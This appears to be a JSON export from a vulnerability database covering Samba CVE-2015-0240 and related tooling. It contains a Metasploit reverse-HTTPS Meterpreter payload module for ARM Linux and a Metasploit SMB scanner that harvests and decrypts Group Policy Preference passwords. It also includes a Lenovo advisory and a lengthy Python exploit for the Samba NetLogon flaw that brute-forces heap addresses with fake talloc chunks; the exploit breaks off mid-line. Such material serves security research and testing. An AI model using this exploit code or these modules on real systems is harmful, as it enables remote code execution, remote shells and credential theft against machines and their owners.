{"metasploit": [{"lastseen": "2019-11-13T17:24:02", "bulletinFamily": "exploit", "description": "Run the Meterpreter / Mettle server payload (stageless)\n", "modified": "2019-05-21T17:40:27", "published": "2017-03-21T09:38:18", "id": "MSF:PAYLOAD/LINUX/ARMLE/METERPRETER_REVERSE_HTTPS", "href": "", "type": "metasploit", "title": "Linux Meterpreter, Reverse HTTPS Inline", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_https'\nrequire 'msf/base/sessions/meterpreter_options'\nrequire 'msf/base/sessions/mettle_config'\nrequire 'msf/base/sessions/meterpreter_armle_linux'\n\nmodule MetasploitModule\n\n CachedSize = 1030744\n\n include Msf::Payload::Single\n include Msf::Sessions::MeterpreterOptions\n include Msf::Sessions::MettleConfig\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',\n 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',\n 'Author' => [\n 'Adam Cammack <adam_cammack[at]rapid7.com>',\n 'Brent Cook <brent_cook[at]rapid7.com>',\n 'timwr'\n ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_ARMLE,\n 'License' => MSF_LICENSE,\n 'Handler' => Msf::Handler::ReverseHttps,\n 'Session' => Msf::Sessions::Meterpreter_armle_Linux\n )\n )\n end\n\n def generate\n opts = {\n scheme: 'https',\n stageless: true\n }\n MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb"}, {"lastseen": "2019-11-23T10:17:13", "bulletinFamily": "exploit", "description": "This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsofts public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.\n", "modified": "2018-09-10T20:04:22", "published": "2015-07-28T19:21:33", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_ENUM_GPP", "href": "", "type": "metasploit", "title": "SMB Group Policy Preference Saved Passwords Enumeration", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/parser/group_policy_preferences'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Aliases for common classes\n SIMPLE = Rex::Proto::SMB::Client\n XCEPT = Rex::Proto::SMB::Exceptions\n CONST = Rex::Proto::SMB::Constants\n\n def initialize\n super(\n 'Name' => 'SMB Group Policy Preference Saved Passwords Enumeration',\n 'Description' => %Q{\n This module enumerates files from target domain controllers and connects to them via SMB.\n It then looks for Group Policy Preference XML files containing local/domain user accounts\n and passwords and decrypts them using Microsofts public AES key. This module has been\n tested successfully on a Win2k8 R2 Domain Controller.\n },\n 'Author' =>\n [\n 'Joshua D. Abraham <jabra[at]praetorian.com>',\n ],\n 'References' =>\n [\n ['MSB', 'MS14-025'],\n ['URL', 'http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13)'],\n ['URL', 'http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html'],\n ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],\n ['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']\n ],\n 'License' => MSF_LICENSE\n )\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of the share on the server', 'SYSVOL']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptBool.new('STORE', [true, 'Store the enumerated files in loot.', true])\n ])\n end\n\n def check_path(ip, path)\n vprint_status(\"Trying to download \\\\\\\\#{ip}\\\\#{path}...\")\n begin\n fd = simple.open(\"\\\\#{path}\", 'ro')\n fd.close\n print_good \"Found Policy Share on #{ip}\"\n smb_download(ip, path)\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n case e.get_error(e.error_code)\n when 'STATUS_FILE_IS_A_DIRECTORY'\n print_good(\"Directory FOUND: \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path}\")\n when 'STATUS_OBJECT_NAME_NOT_FOUND'\n vprint_error(\"Object \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path} NOT found!\")\n when 'STATUS_OBJECT_PATH_NOT_FOUND'\n vprint_error(\"Object PATH \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path} NOT found!\")\n when 'STATUS_ACCESS_DENIED'\n vprint_error(\"Host reports access denied.\")\n when 'STATUS_BAD_NETWORK_NAME'\n vprint_error(\"Host is NOT connected to #{datastore['SMBDomain']}!\")\n when 'STATUS_INSUFF_SERVER_RESOURCES'\n vprint_error(\"Host rejected with insufficient resources!\")\n when 'STATUS_OBJECT_NAME_INVALID'\n vprint_error(\"opening \\\\#{path} bad filename\")\n else\n return\n end\n end\n end\n\n def report_creds(ip, user, password)\n service_data = {\n address: ip,\n port: rport,\n protocol: 'tcp',\n service_name: 'smb',\n workspace_id: myworkspace_id\n }\n\n new_user = user.sub(/\\s+.*/, '')\n first, rest = new_user.split(/\\\\/)\n if first && rest\n domain = first\n user = rest\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: user,\n private_data: password,\n private_type: :password,\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: domain,\n }\n else\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: new_user,\n private_data: password,\n private_type: :password\n }\n end\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n\n def parse_xml(ip, path, xml_file)\n mxml = xml_file[:xml]\n print_status \"Parsing file: \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\\\\#{path}\"\n file_type = File.basename(xml_file[:path].gsub(\"\\\\\",\"/\"))\n results = Rex::Parser::GPP.parse(mxml)\n tables = Rex::Parser::GPP.create_tables(results, file_type, xml_file[:domain], xml_file[:dc])\n\n tables.each do |table|\n print_good(table.to_s)\n end\n\n results.each do |result|\n if datastore['STORE']\n stored_path = store_loot('microsoft.windows.gpp', 'text/xml', ip, xml_file[:xml], file_type, xml_file[:path])\n print_good(\"XML file saved to: #{stored_path}\")\n end\n\n report_creds(ip, result[:USER], result[:PASS])\n end\n end\n\n def smb_download(ip, path)\n vprint_status(\"Downloading #{path}...\")\n\n fd = simple.open(\"\\\\#{path}\", 'ro')\n data = fd.read\n fd.close\n\n path_elements = path.split('\\\\')\n ret_obj = {\n :dc => ip,\n :path => path,\n :xml => data\n }\n ret_obj[:domain] = path_elements[0]\n\n parse_xml(ip, path, ret_obj) if ret_obj\n\n fname = path.split(\"\\\\\")[-1]\n\n if datastore['STORE']\n path = store_loot('smb.shares.file', 'application/octet-stream', ip, data, fname)\n print_good(\"#{fname} saved as: #{path}\")\n end\n end\n\n def run_host(ip)\n print_status('Connecting to the server...')\n begin\n connect\n smb_login\n print_status(\"Mounting the remote share \\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}'...\")\n simple.connect(\"\\\\\\\\#{ip}\\\\#{datastore['SMBSHARE']}\")\n\n root_listing = simple.client.find_first(\"*\")\n corp_domain = ''\n root_listing.each_key do |key|\n next if key == '.' || key == '..'\n corp_domain = key\n end\n\n sub_folder_listing = simple.client.find_first(\"#{corp_domain}\\\\Policies\\\\*\")\n sub_folders = []\n sub_folder_listing.each_key do |key|\n next if key == '.' || key == '..'\n sub_folders << key\n end\n\n gpp_locations = %w(\n \\\\MACHINE\\\\Preferences\\\\Groups\\\\Groups.xml\n \\\\USER\\\\Preferences\\\\Groups\\\\Groups.xml\n \\\\MACHINE\\\\Preferences\\\\Services\\\\Services.xml\n \\\\USER\\\\Preferences\\\\Printers\\\\Printers.xml\n \\\\USER\\\\Preferences\\\\Drives\\\\Drives.xml\n \\\\MACHINE\\\\Preferences\\\\Datasources\\\\DataSources.xml\n \\\\USER\\\\Preferences\\\\Datasources\\\\DataSources.xml\n \\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\n \\\\USER\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\n )\n sub_folders.each do |i|\n gpp_locations.each do |gpp_l|\n check_path(ip,\"#{corp_domain}\\\\Policies\\\\#{i}#{gpp_l}\")\n end\n end\n rescue ::Exception => e\n print_error(\"#{rhost}: #{e.class} #{e}\")\n ensure\n disconnect\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_enum_gpp.rb"}], "lenovo": [{"lastseen": "2018-02-21T17:01:59", "bulletinFamily": "info", "description": "**Lenovo Security Advisory:** LEN-2015-016 \n**Potential Impact:** Execution of arbitrary code \n****Severity****: High \n \n**Summary:** Samba is an open-source implementation of the Server Message Block (SMB) or Common Internet File System (CIFS) protocol, which allows PC-compatible machines to share files, printers, and other information. An uninitialized pointer use flaw was found in the Samba daemon (smbd). A malicious Samba client could send specially crafted netlogon packets that could potentially lead to arbitrary code execution with the privileges of the user running smbd. \n \nSamba is utilized by Lifeline firmware which ships on LenovoEMC network storage devices. Refer to Product Impact for information about remediation. \n \n**Product Impact:**\n\n**Affected Product ** | **Lifeline minimum version including fix** | **Link ** \n---|---|--- \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC EZ Media & Backup (hm3)\n\n| 4.1.110.33149 ** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32028> \n \nLenovoEMC ix2 (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/31178> \n \nLenovoEMC ix4-300d (inc DL)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px2-300d (inc NVR)\n\n| 4.1.110.33149** ** | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32094> \n \nLenovoEMC px4-300d (inc NVR)\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27363> \n \nLenovoEMC px4-300r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27368> \n \nLenovoEMC px4-400d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400d NVR\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33814> \n \nLenovoEMC px4-400r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/33824> \n \nLenovoEMC px6-300d\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/27366> \n \nLenovoEMC px12-400r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC px12-450r\n\n| 4.1.110.33149 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/32092> \n \nLenovoEMC ix12-300r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC px12-350r\n\n| 4.0.18.33013 | \n\n<https://lenovo-na-en.custhelp.com/app/answers/detail/a_id/23142> \n \nLenovoEMC Home Media Cloud Edition (hm2)\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix2-200 Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \nLenovoEMC ix4-200d Cloud Edition\n\n| 3.2.12.30116 | \n\n<http://lenovo-na-en.custhelp.com/app/answers/detail/a_id/26784> \n \n \n**Acknowledgements: **None \n**Other information and references:**\n\n * <https://www.us-cert.gov/ncas/current-activity/2015/02/24/Samba-Remote-Code-Execution-Vulnerability>\n * CVE ID: [CVE-2015-0240](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0240>)\n**Revision History:**\n\n****Revision****\n\n| \n\n****Date****\n\n| \n\n****Description**** \n \n---|---|--- \n** 1.1** | ** 6 Jun 2015** | ** Published additional fixes** \n** 1.0** | ** 3 Apr 2015** | ** Initial release**\n", "modified": "2017-01-23T00:00:00", "published": "2017-01-23T00:00:00", "id": "LENOVO:PS500014-NOSID", "href": "https://support.lenovo.com/us/en/product_security/samba_remote_vuln", "type": "lenovo", "title": "Samba Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:25:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2015-11-13T00:00:00", "published": "2015-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89724", "id": "SSV:89724", "type": "seebug", "title": "Samba NetLogon\u672a\u521d\u59cb\u5316\u6307\u9488\u6f0f\u6d1e\uff08CVE-2015-0240\uff09", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address ...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: 